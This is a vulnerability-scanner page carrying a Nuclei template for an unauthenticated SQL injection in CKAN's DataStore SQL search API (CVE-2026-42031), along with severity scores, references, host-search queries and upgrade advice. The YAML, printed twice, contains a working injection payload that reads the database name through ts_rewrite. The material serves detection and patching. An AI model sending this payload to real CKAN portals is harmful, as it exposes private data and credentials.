CKAN DataStore SQL Search - SQL Injection

CVE-2026-42031

Verified

Description

CKAN, an open-source data management system used for powering open data portals, contains an unauthenticated SQL injection vulnerability in the datastore_search_sql API endpoint.

Severity

High

CVSS Score

9.8

Exploit Probability

14%

Published Date

May 4, 2026

Template Author

theamanrawat

CVE-2026-42031.yaml

id: CVE-2026-42031

info:
  name: CKAN DataStore SQL Search - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    CKAN, an open-source data management system used for powering open data portals, contains an unauthenticated SQL injection vulnerability in the datastore_search_sql API endpoint.
  impact: |
    An unauthenticated attacker can read arbitrary data from the PostgreSQL database including system catalog tables, private DataStore resources, and potentially user credentials.
  remediation: |
    Upgrade CKAN to version 2.10.10 or 2.11.5 or later.
  reference:
    - https://github.com/advisories/GHSA-h7j7-3rx6-xvcg
    - https://github.com/ckan/ckan/security/advisories/GHSA-h7j7-3rx6-xvcg
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-42031
    epss-score: 0.13784
    epss-percentile: 0.94372
    cwe-id: CWE-89
  metadata:
    max-request: 2
    verified: true
    shodan-query: http.title:"CKAN"
    fofa-query: title="CKAN"
  tags: cve,cve2026,ckan,sqli,datastore,unauth

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/action/status_show"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "ckan_version"
          - '"success": true'
        condition: and
        internal: true

      - type: status
        status:
          - 200
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/api/action/datastore_search_sql?sql=SELECT+ts_rewrite('a'::tsquery,+'SELECT+''a''::tsquery,+(SELECT+current_database())::tsquery')"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"success": true'
          - "ts_rewrite"
          - "records"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022009a4a0dcc77cba85322fee450a2bf1d0c9b8d8a7c39ba51f1dba2bcb63265d34022100d07ba14195247912e8bb20724bdd3d7516caae7e9d466cb529eca32aed58e946:922c64590222798bb761d5b6d8e72950

9.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2026-42031

CWE ID:

cwe-89

References

https://github.com/advisories/GHSA-h7j7-3rx6-xvcg https://github.com/ckan/ckan/security/advisories/GHSA-h7j7-3rx6-xvcg

Remediation Steps

Upgrade CKAN to version 2.10.10 or 2.11.5 or later.

id: CVE-2026-42031

info:
  name: CKAN DataStore SQL Search - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    CKAN, an open-source data management system used for powering open data portals, contains an unauthenticated SQL injection vulnerability in the datastore_search_sql API endpoint.
  impact: |
    An unauthenticated attacker can read arbitrary data from the PostgreSQL database including system catalog tables, private DataStore resources, and potentially user credentials.
  remediation: |
    Upgrade CKAN to version 2.10.10 or 2.11.5 or later.
  reference:
    - https://github.com/advisories/GHSA-h7j7-3rx6-xvcg
    - https://github.com/ckan/ckan/security/advisories/GHSA-h7j7-3rx6-xvcg
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-42031
    epss-score: 0.13784
    epss-percentile: 0.94372
    cwe-id: CWE-89
  metadata:
    max-request: 2
    verified: true
    shodan-query: http.title:"CKAN"
    fofa-query: title="CKAN"
  tags: cve,cve2026,ckan,sqli,datastore,unauth

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/action/status_show"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "ckan_version"
          - '"success": true'
        condition: and
        internal: true

      - type: status
        status:
          - 200
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/api/action/datastore_search_sql?sql=SELECT+ts_rewrite('a'::tsquery,+'SELECT+''a''::tsquery,+(SELECT+current_database())::tsquery')"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"success": true'
          - "ts_rewrite"
          - "records"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022009a4a0dcc77cba85322fee450a2bf1d0c9b8d8a7c39ba51f1dba2bcb63265d34022100d07ba14195247912e8bb20724bdd3d7516caae7e9d466cb529eca32aed58e946:922c64590222798bb761d5b6d8e72950

CKAN DataStore SQL Search - SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

CKAN DataStore SQL Search - SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps